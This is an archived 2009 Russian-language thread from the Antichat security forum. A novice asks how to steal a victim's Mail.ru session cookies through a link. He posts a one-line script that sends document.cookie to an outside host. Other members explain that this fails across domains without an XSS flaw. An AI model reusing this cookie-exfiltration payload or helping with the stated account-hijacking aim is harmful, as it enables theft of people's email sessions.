ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
Кража куки через клик по ссылке |
04.05.2009, 21:25
|
|
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520
Репутация:
6
|
|
Кража куки через клик по ссылке
если я на бесплатном хосте сделаю хтмл страницу с скриптом, который тырит куки
Код HTML:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
и жертва откроет по ссылке ету страницу, то у меня будут куки или нет?
ЗЫ: пишем те, кто уже точно знает! |
|
|
04.05.2009, 21:27
|
|
Постоянный
Регистрация: 17.12.2008
Сообщений: 353
Провел на форуме:
919131
Репутация:
74
|
|
В общем случае куки можно получить только в рамках одного домена.
|
|
|
|
04.05.2009, 21:38
|
|
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520
Репутация:
6
|
|
смотри, я послал жертве на мейл.ру она открыла ссылку етой странице, у меня буду ее куки от почтового ящика?!
|
|
|
|
04.05.2009, 21:44
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 147
Провел на форуме:
438137
Репутация:
66
|
|
не будут
|
|
|
|
04.05.2009, 21:46
|
|
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520
Репутация:
6
|
|
так как же можно получить куки, если жертва киликает по ссылки, как? какой скрипт, уже много статей почитал инфы 0!искать xss ето не к етой теме!
|
|
|
|
04.05.2009, 21:59
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Ты, видимо, не понимаешь, что куки без xss не своруешь.
|
|
|
|
04.05.2009, 22:02
|
|
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520
Репутация:
6
|
|
та бред ети xss, если меня интересует определенное мыло, и xss на нем нету, как кто то же можно угнать куки!!!!!!!
ЗЫ брут бредддддддд!
|
|
|
|
04.05.2009, 22:28
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
Провел на форуме:
1325167
Репутация:
100
|
|
Бред говоришь ты.
У тебя есть колеса - этот скрипт. Но нет двигателя XSS
Как ты без двигателя толкнешь колеса?
Да никак.
Xss и используется, чтобы сookie своровать.
|
|
|
|
04.05.2009, 22:40
|
|
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520
Репутация:
6
|
|
ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должні прибивать, коль о них много народу знает!
|
|
|
|
04.05.2009, 22:41
|
|
Познающий
Регистрация: 29.04.2009
Сообщений: 56
Провел на форуме:
210520
Репутация:
6
|
|
ну вот например в3ять мейл ру, именно почту, а не другие ресурсы, наврядли там есть xss
Зы: 1. пасивная xss что нам дает, с ней моно гнать куки
2. и вообще пасивніе же xss должны прибивать, коль о них много народу знает!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
